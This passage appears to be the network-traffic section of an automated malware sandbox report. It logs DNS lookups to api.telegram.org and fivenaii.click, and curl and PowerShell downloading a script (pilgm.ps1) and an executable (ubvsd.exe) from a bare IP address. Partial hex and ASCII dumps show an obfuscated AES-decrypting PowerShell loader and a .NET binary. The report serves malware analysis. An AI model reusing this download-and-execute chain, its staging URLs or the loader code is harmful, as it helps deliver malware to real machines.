                                                                                              Dec 27, 2024 22:33:39.827014923 CET49773443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:39.827186108 CET49773443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:39.827203989 CET44349773104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:40.317163944 CET44349774104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:40.317444086 CET44349774104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:40.317517042 CET49774443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:40.317606926 CET49774443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:40.317630053 CET44349774104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:40.582273006 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:40.582307100 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:40.582422972 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:40.582799911 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:40.582809925 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.877209902 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.877377033 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.878696918 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.878710985 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.879154921 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.880471945 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.881293058 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.881341934 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.881458998 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.881493092 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.881597996 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.881647110 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.881767035 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.881802082 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.881952047 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.881983042 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.882131100 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.882163048 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.882170916 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.882304907 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.882323980 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.927330017 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.927541018 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.927591085 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.927603960 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.975339890 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.975580931 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.975619078 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.975636959 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:42.023333073 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:42.023535967 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:42.071343899 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:42.242402077 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:44.137309074 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:44.137588978 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:44.137674093 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:44.137873888 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:44.137911081 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:44.142843008 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:44.142918110 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:44.143013000 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:44.143285036 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:44.143309116 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:45.407505035 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:45.407596111 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:45.408843040 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:45.408850908 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:45.409164906 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:45.410346985 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:45.410367966 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:45.410439014 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:46.187438965 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:46.187699080 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:46.187891006 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:46.187957048 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:46.187989950 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:46.188018084 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:46.188034058 CET44349776104.21.60.24192.168.2.4

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 27, 2024 22:32:56.205391884 CET5881953192.168.2.41.1.1.1
                                                                                              Dec 27, 2024 22:32:56.342873096 CET53588191.1.1.1192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.505251884 CET6109553192.168.2.41.1.1.1
                                                                                              Dec 27, 2024 22:33:11.819262981 CET53610951.1.1.1192.168.2.4

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 27, 2024 22:32:56.205391884 CET192.168.2.41.1.1.10xb8c4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2024 22:33:11.505251884 CET192.168.2.41.1.1.10xb81Standard query (0)fivenaii.clickA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 27, 2024 22:32:56.342873096 CET1.1.1.1192.168.2.40xb8c4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2024 22:33:11.819262981 CET1.1.1.1192.168.2.40xb81No error (0)fivenaii.click104.21.60.24A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2024 22:33:11.819262981 CET1.1.1.1192.168.2.40xb81No error (0)fivenaii.click172.67.188.180A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • api.telegram.org
                                                                                              • fivenaii.click
                                                                                              • 147.45.44.131

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449734147.45.44.131807780C:\Windows\SysWOW64\curl.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 27, 2024 22:33:02.008841038 CET195OUTGET /infopage/pilgm.ps1 HTTP/1.1
                                                                                              Host: 147.45.44.131
                                                                                              User-Agent: curl/7.83.1
                                                                                              Accept: */*
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Dec 27, 2024 22:33:03.302025080 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:03 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:09:39 GMT
                                                                                              ETag: "638-62a0d0bb75721"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 1592
                                                                                              Data Raw: 0d 0a 24 59 6d 62 41 20 3d 20 27 7a 7a 66 62 64 65 36 33 48 59 4b 6c 61 4e 30 54 6f 6c 6f 6d 78 48 70 64 67 51 73 45 46 50 53 73 4b 49 51 4e 6e 2b 5a 54 45 69 77 3d 27 0d 0a 24 53 47 62 35 20 3d 20 27 63 6f 33 44 38 75 64 37 53 47 30 50 6b 4a 6c 6b 62 57 42 46 78 51 3d 3d 27 0d 0a 24 32 66 4a 70 20 3d 20 27 6f 30 58 57 35 5a 37 2b 2f 55 6b 41 54 42 58 38 73 54 79 4e 4f 39 4c 4c 63 41 4a 47 73 6f 67 34 5a 2b 34 37 6e 70 35 69 47 35 6d 79 65 42 51 4b 47 61 37 4f 69 53 47 61 73 70 36 4e 69 7a 45 54 42 58 48 6e 6b 49 6c 63 2f 4a 33 38 61 50 4c 6f 6e 50 2f 70 47 66 33 48 71 36 36 2b 32 62 76 2f 63 66 70 73 68 68 63 58 38 48 6d 70 70 65 7a 46 46 6e 6e 4f 77 6c 73 42 4c 44 41 63 4c 49 4a 79 79 73 46 52 6a 71 61 39 63 74 65 72 51 32 74 4d 48 4a 45 45 76 2b 62 43 6d 2b 79 73 35 52 4c 64 6a 44 57 49 6e 59 36 75 75 46 56 69 68 5a 4c 71 6b 64 63 33 49 64 39 6a 63 4e 4d 73 4c 71 47 48 54 38 63 6b 6e 50 43 69 37 77 6b 72 55 52 2f 6d 6a 43 30 47 67 6b 30 6c 77 79 34 62 78 64 52 41 63 77 43 62 6d 6d 4a 30 65 70 33 [TRUNCATED]
                                                                                              Data Ascii: $YmbA = 'zzfbde63HYKlaN0TolomxHpdgQsEFPSsKIQNn+ZTEiw='$SGb5 = 'co3D8ud7SG0PkJlkbWBFxQ=='$2fJp = 'o0XW5Z7+/UkATBX8sTyNO9LLcAJGsog4Z+47np5iG5myeBQKGa7OiSGasp6NizETBXHnkIlc/J38aPLonP/pGf3Hq66+2bv/cfpshhcX8HmppezFFnnOwlsBLDAcLIJyysFRjqa9cterQ2tMHJEEv+bCm+ys5RLdjDWInY6uuFVihZLqkdc3Id9jcNMsLqGHT8cknPCi7wkrUR/mjC0Ggk0lwy4bxdRAcwCbmmJ0ep3LQVIQyOptXO9gXE/dzsGuIpdxDQbaXwzcIAqgpqnenHUOMv3cilCoyUdaaSRewmex+DM1QoA6PmkZZLEQrkrDpW3vem/bKOFvrgnuR2C8IyGBHEvmsCJqTCkf2jq3NfmjDqnsS5QLZCuazft30vziIumSGfvrYyWAd5OJP1YXQde59s21K1WY0NQn6n0+rnGUJT64wF5ylX8Kxv1keWC/rV4Ugf7fTpfRwKPgLwf/Z650DCiv+jkc2YubbaE+XIjFQ9NBBNOKgmhnmhOLce3sSiDJmXlZU++MmxIY0wwzd1P8M3InRE4NQqu90QnBj0JmLlbt3MJVBsDMEPfn8GLUcE6Cskc1o7ASk9TIsPmmKpBnEyWcUxQYPlt4syzxOD3AkEcuXcbzzT52K7HZbSLz'function etCc ($azvH, $YmbA, $SGb5) { $NWby = [Convert]::FromBase64String($YmbA) $zlhV = [Convert]::FromBase64String($SGb5) $aWSD = [Convert]::FromBase64String($azvH) $GyiY = [System.Security.Cryptography.Aes]::Create() $GyiY.Key = $NWby [TRUNCATED]
                                                                                              Dec 27, 2024 22:33:03.302047014 CET561INData Raw: 56 0d 0a 20 20 20 20 24 47 79 69 59 2e 50 61 64 64 69 6e 67 20 3d 20 5b 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 50 61 64 64 69 6e 67 4d 6f 64 65 5d 3a 3a 50 4b 43 53 37 0d 0a 20 20 20 20 24 4b 52 32
                                                                                              Data Ascii: V $GyiY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $KR29 = $GyiY.CreateDecryptor($GyiY.Key, $GyiY.IV) $aHGE = New-Object System.IO.MemoryStream(, $aWSD) $dqtj = New-Object System.Security.Cryptography.Crypt


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449735147.45.44.131807888C:\Windows\SysWOW64\curl.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 27, 2024 22:33:02.362827063 CET195OUTGET /infopage/pilgm.ps1 HTTP/1.1
                                                                                              Host: 147.45.44.131
                                                                                              User-Agent: curl/7.83.1
                                                                                              Accept: */*
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Dec 27, 2024 22:33:03.602217913 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:03 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:09:39 GMT
                                                                                              ETag: "638-62a0d0bb75721"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 1592
                                                                                              Data Raw: 0d 0a 24 59 6d 62 41 20 3d 20 27 7a 7a 66 62 64 65 36 33 48 59 4b 6c 61 4e 30 54 6f 6c 6f 6d 78 48 70 64 67 51 73 45 46 50 53 73 4b 49 51 4e 6e 2b 5a 54 45 69 77 3d 27 0d 0a 24 53 47 62 35 20 3d 20 27 63 6f 33 44 38 75 64 37 53 47 30 50 6b 4a 6c 6b 62 57 42 46 78 51 3d 3d 27 0d 0a 24 32 66 4a 70 20 3d 20 27 6f 30 58 57 35 5a 37 2b 2f 55 6b 41 54 42 58 38 73 54 79 4e 4f 39 4c 4c 63 41 4a 47 73 6f 67 34 5a 2b 34 37 6e 70 35 69 47 35 6d 79 65 42 51 4b 47 61 37 4f 69 53 47 61 73 70 36 4e 69 7a 45 54 42 58 48 6e 6b 49 6c 63 2f 4a 33 38 61 50 4c 6f 6e 50 2f 70 47 66 33 48 71 36 36 2b 32 62 76 2f 63 66 70 73 68 68 63 58 38 48 6d 70 70 65 7a 46 46 6e 6e 4f 77 6c 73 42 4c 44 41 63 4c 49 4a 79 79 73 46 52 6a 71 61 39 63 74 65 72 51 32 74 4d 48 4a 45 45 76 2b 62 43 6d 2b 79 73 35 52 4c 64 6a 44 57 49 6e 59 36 75 75 46 56 69 68 5a 4c 71 6b 64 63 33 49 64 39 6a 63 4e 4d 73 4c 71 47 48 54 38 63 6b 6e 50 43 69 37 77 6b 72 55 52 2f 6d 6a 43 30 47 67 6b 30 6c 77 79 34 62 78 64 52 41 63 77 43 62 6d 6d 4a 30 65 70 33 [TRUNCATED]
                                                                                              Data Ascii: $YmbA = 'zzfbde63HYKlaN0TolomxHpdgQsEFPSsKIQNn+ZTEiw='$SGb5 = 'co3D8ud7SG0PkJlkbWBFxQ=='$2fJp = 'o0XW5Z7+/UkATBX8sTyNO9LLcAJGsog4Z+47np5iG5myeBQKGa7OiSGasp6NizETBXHnkIlc/J38aPLonP/pGf3Hq66+2bv/cfpshhcX8HmppezFFnnOwlsBLDAcLIJyysFRjqa9cterQ2tMHJEEv+bCm+ys5RLdjDWInY6uuFVihZLqkdc3Id9jcNMsLqGHT8cknPCi7wkrUR/mjC0Ggk0lwy4bxdRAcwCbmmJ0ep3LQVIQyOptXO9gXE/dzsGuIpdxDQbaXwzcIAqgpqnenHUOMv3cilCoyUdaaSRewmex+DM1QoA6PmkZZLEQrkrDpW3vem/bKOFvrgnuR2C8IyGBHEvmsCJqTCkf2jq3NfmjDqnsS5QLZCuazft30vziIumSGfvrYyWAd5OJP1YXQde59s21K1WY0NQn6n0+rnGUJT64wF5ylX8Kxv1keWC/rV4Ugf7fTpfRwKPgLwf/Z650DCiv+jkc2YubbaE+XIjFQ9NBBNOKgmhnmhOLce3sSiDJmXlZU++MmxIY0wwzd1P8M3InRE4NQqu90QnBj0JmLlbt3MJVBsDMEPfn8GLUcE6Cskc1o7ASk9TIsPmmKpBnEyWcUxQYPlt4syzxOD3AkEcuXcbzzT52K7HZbSLz'function etCc ($azvH, $YmbA, $SGb5) { $NWby = [Convert]::FromBase64String($YmbA) $zlhV = [Convert]::FromBase64String($SGb5) $aWSD = [Convert]::FromBase64String($azvH) $GyiY = [System.Security.Cryptography.Aes]::Create() $GyiY.Key = $NWby [TRUNCATED]
                                                                                              Dec 27, 2024 22:33:03.602278948 CET561INData Raw: 56 0d 0a 20 20 20 20 24 47 79 69 59 2e 50 61 64 64 69 6e 67 20 3d 20 5b 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 50 61 64 64 69 6e 67 4d 6f 64 65 5d 3a 3a 50 4b 43 53 37 0d 0a 20 20 20 20 24 4b 52 32
                                                                                              Data Ascii: V $GyiY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $KR29 = $GyiY.CreateDecryptor($GyiY.Key, $GyiY.IV) $aHGE = New-Object System.IO.MemoryStream(, $aWSD) $dqtj = New-Object System.Security.Cryptography.Crypt


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449736147.45.44.131807956C:\Windows\SysWOW64\curl.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 27, 2024 22:33:02.730586052 CET195OUTGET /infopage/pilgm.ps1 HTTP/1.1
                                                                                              Host: 147.45.44.131
                                                                                              User-Agent: curl/7.83.1
                                                                                              Accept: */*
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Dec 27, 2024 22:33:04.075124979 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:03 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:09:39 GMT
                                                                                              ETag: "638-62a0d0bb75721"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 1592
                                                                                              Data Raw: 0d 0a 24 59 6d 62 41 20 3d 20 27 7a 7a 66 62 64 65 36 33 48 59 4b 6c 61 4e 30 54 6f 6c 6f 6d 78 48 70 64 67 51 73 45 46 50 53 73 4b 49 51 4e 6e 2b 5a 54 45 69 77 3d 27 0d 0a 24 53 47 62 35 20 3d 20 27 63 6f 33 44 38 75 64 37 53 47 30 50 6b 4a 6c 6b 62 57 42 46 78 51 3d 3d 27 0d 0a 24 32 66 4a 70 20 3d 20 27 6f 30 58 57 35 5a 37 2b 2f 55 6b 41 54 42 58 38 73 54 79 4e 4f 39 4c 4c 63 41 4a 47 73 6f 67 34 5a 2b 34 37 6e 70 35 69 47 35 6d 79 65 42 51 4b 47 61 37 4f 69 53 47 61 73 70 36 4e 69 7a 45 54 42 58 48 6e 6b 49 6c 63 2f 4a 33 38 61 50 4c 6f 6e 50 2f 70 47 66 33 48 71 36 36 2b 32 62 76 2f 63 66 70 73 68 68 63 58 38 48 6d 70 70 65 7a 46 46 6e 6e 4f 77 6c 73 42 4c 44 41 63 4c 49 4a 79 79 73 46 52 6a 71 61 39 63 74 65 72 51 32 74 4d 48 4a 45 45 76 2b 62 43 6d 2b 79 73 35 52 4c 64 6a 44 57 49 6e 59 36 75 75 46 56 69 68 5a 4c 71 6b 64 63 33 49 64 39 6a 63 4e 4d 73 4c 71 47 48 54 38 63 6b 6e 50 43 69 37 77 6b 72 55 52 2f 6d 6a 43 30 47 67 6b 30 6c 77 79 34 62 78 64 52 41 63 77 43 62 6d 6d 4a 30 65 70 33 [TRUNCATED]
                                                                                              Data Ascii: $YmbA = 'zzfbde63HYKlaN0TolomxHpdgQsEFPSsKIQNn+ZTEiw='$SGb5 = 'co3D8ud7SG0PkJlkbWBFxQ=='$2fJp = 'o0XW5Z7+/UkATBX8sTyNO9LLcAJGsog4Z+47np5iG5myeBQKGa7OiSGasp6NizETBXHnkIlc/J38aPLonP/pGf3Hq66+2bv/cfpshhcX8HmppezFFnnOwlsBLDAcLIJyysFRjqa9cterQ2tMHJEEv+bCm+ys5RLdjDWInY6uuFVihZLqkdc3Id9jcNMsLqGHT8cknPCi7wkrUR/mjC0Ggk0lwy4bxdRAcwCbmmJ0ep3LQVIQyOptXO9gXE/dzsGuIpdxDQbaXwzcIAqgpqnenHUOMv3cilCoyUdaaSRewmex+DM1QoA6PmkZZLEQrkrDpW3vem/bKOFvrgnuR2C8IyGBHEvmsCJqTCkf2jq3NfmjDqnsS5QLZCuazft30vziIumSGfvrYyWAd5OJP1YXQde59s21K1WY0NQn6n0+rnGUJT64wF5ylX8Kxv1keWC/rV4Ugf7fTpfRwKPgLwf/Z650DCiv+jkc2YubbaE+XIjFQ9NBBNOKgmhnmhOLce3sSiDJmXlZU++MmxIY0wwzd1P8M3InRE4NQqu90QnBj0JmLlbt3MJVBsDMEPfn8GLUcE6Cskc1o7ASk9TIsPmmKpBnEyWcUxQYPlt4syzxOD3AkEcuXcbzzT52K7HZbSLz'function etCc ($azvH, $YmbA, $SGb5) { $NWby = [Convert]::FromBase64String($YmbA) $zlhV = [Convert]::FromBase64String($SGb5) $aWSD = [Convert]::FromBase64String($azvH) $GyiY = [System.Security.Cryptography.Aes]::Create() $GyiY.Key = $NWby [TRUNCATED]
                                                                                              Dec 27, 2024 22:33:04.075239897 CET561INData Raw: 56 0d 0a 20 20 20 20 24 47 79 69 59 2e 50 61 64 64 69 6e 67 20 3d 20 5b 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 50 61 64 64 69 6e 67 4d 6f 64 65 5d 3a 3a 50 4b 43 53 37 0d 0a 20 20 20 20 24 4b 52 32
                                                                                              Data Ascii: V $GyiY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $KR29 = $GyiY.CreateDecryptor($GyiY.Key, $GyiY.IV) $aHGE = New-Object System.IO.MemoryStream(, $aWSD) $dqtj = New-Object System.Security.Cryptography.Crypt


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449737147.45.44.131807824C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 27, 2024 22:33:05.000866890 CET181OUTGET /infopage/ubvsd.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Connection: Keep-Alive
                                                                                              Dec 27, 2024 22:33:06.356055975 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:06 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:05:52 GMT
                                                                                              ETag: "8e00-62a0cfe2cdd29"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 36352
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdos-program
                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 91 b7 cd 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 84 00 00 00 08 00 00 00 00 00 00 1a a3 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a2 00 00 4f 00 00 00 00 c0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 ac a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0 @ `O H.text `.rsrc@@.reloc@BHD"h0ss(oooooi(oiiYii(oio ,o,o,o*(t0(((o*(*0rpss o!rsp~(o"&o!rs
                                                                                              Dec 27, 2024 22:33:06.356112957 CET1236INData Raw: 70 7e 01 00 00 04 28 02 00 00 06 6f 22 00 00 0a 26 07 17 6f 23 00 00 0a 07 17 8d 22 00 00 01 25 16 06 7e 01 00 00 04 28 02 00 00 06 a2 6f 24 00 00 0a 6f 25 00 00 0a 72 3a 74 00 70 7e 01 00 00 04 28 02 00 00 06 6f 26 00 00 0a 72 94 74 00 70 7e 01
                                                                                              Data Ascii: p~(o"&o#"%~(o$o%r:tp~(o&rtp~(o'o(&*(*(*(*(*j(rtp(o*BSJBv4.0.30319l#~,P#Strings|(u#US~
                                                                                              Dec 27, 2024 22:33:06.356147051 CET1236INData Raw: 00 42 69 74 56 65 63 74 6f 72 33 32 00 67 32 00 70 32 00 43 6f 6e 73 6f 6c 65 41 70 70 31 36 37 00 67 65 74 5f 55 54 46 38 00 3c 4d 6f 64 75 6c 65 3e 00 73 65 74 5f 49 56 00 6d 73 63 6f 72 6c 69 62 00 41 64 64 00 53 79 73 74 65 6d 2e 43 6f 6c 6c
                                                                                              Data Ascii: BitVector32g2p2ConsoleApp167get_UTF8<Module>set_IVmscorlibAddSystem.Collections.SpecializedGetMethodCompileAssemblyFromSourceset_ModePaddingModeCipherModeInvokeIDisposableSystem.Net.MimeGetTypeSystem.CoreMethodBaseDispose
                                                                                              Dec 27, 2024 22:33:06.356235981 CET1236INData Raw: 6e 76 65 72 74 00 53 79 73 74 65 6d 2e 54 65 78 74 00 49 6d 67 6c 73 77 00 41 72 72 61 79 00 73 65 74 5f 4b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 43 6f 6d 70 69 6c 65 64 41 73
                                                                                              Data Ascii: nvertSystem.TextImglswArrayset_KeySystem.Security.Cryptographyget_CompiledAssemblyCopyset_GenerateInMemorys7eV61nHmqYXSS+ryCq4pt/5Wpqq5HxdeLHXTEHvwc/zpyD/XGm2DyHLr95ry
                                                                                              Dec 27, 2024 22:33:06.356267929 CET1236INData Raw: 00 32 00 59 00 43 00 51 00 32 00 6c 00 4b 00 71 00 73 00 49 00 77 00 61 00 43 00 7a 00 59 00 6e 00 4c 00 75 00 5a 00 34 00 74 00 6d 00 49 00 56 00 79 00 4a 00 77 00 34 00 57 00 36 00 55 00 68 00 6c 00 49 00 72 00 64 00 74 00 4f 00 70 00 72 00 2b
                                                                                              Data Ascii: 2YCQ2lKqsIwaCzYnLuZ4tmIVyJw4W6UhlIrdtOpr+tNdW3vqkhU8XyaXCKs9GA8lM8UCFkZ+kiJGJspAPSPXC0FjSGpiIs5LRtws1CW+PuXqQ2Lpvd5ZUsFST
                                                                                              Dec 27, 2024 22:33:06.356302977 CET1236INData Raw: 00 31 00 6e 00 71 00 5a 00 74 00 55 00 31 00 44 00 44 00 6a 00 54 00 61 00 4c 00 64 00 45 00 79 00 79 00 57 00 42 00 31 00 76 00 4d 00 73 00 4a 00 41 00 30 00 70 00 79 00 78 00 39 00 51 00 4e 00 39 00 75 00 68 00 34 00 64 00 49 00 54 00 50 00 70
                                                                                              Data Ascii: 1nqZtU1DDjTaLdEyyWB1vMsJA0pyx9QN9uh4dITPp8I6d+YKrfTb7W4lSia7zPzzCvXV1QXwclyuVeIcDXENvlXiOTChtQwxDxxwihXPmvksDBkeZ47M4LuWf
                                                                                              Dec 27, 2024 22:33:06.356336117 CET776INData Raw: 00 6e 00 49 00 64 00 69 00 49 00 31 00 66 00 76 00 67 00 45 00 2f 00 46 00 56 00 43 00 50 00 30 00 42 00 64 00 44 00 33 00 5a 00 6c 00 59 00 57 00 55 00 46 00 57 00 48 00 63 00 6d 00 53 00 43 00 36 00 69 00 62 00 37 00 59 00 43 00 39 00 32 00 38
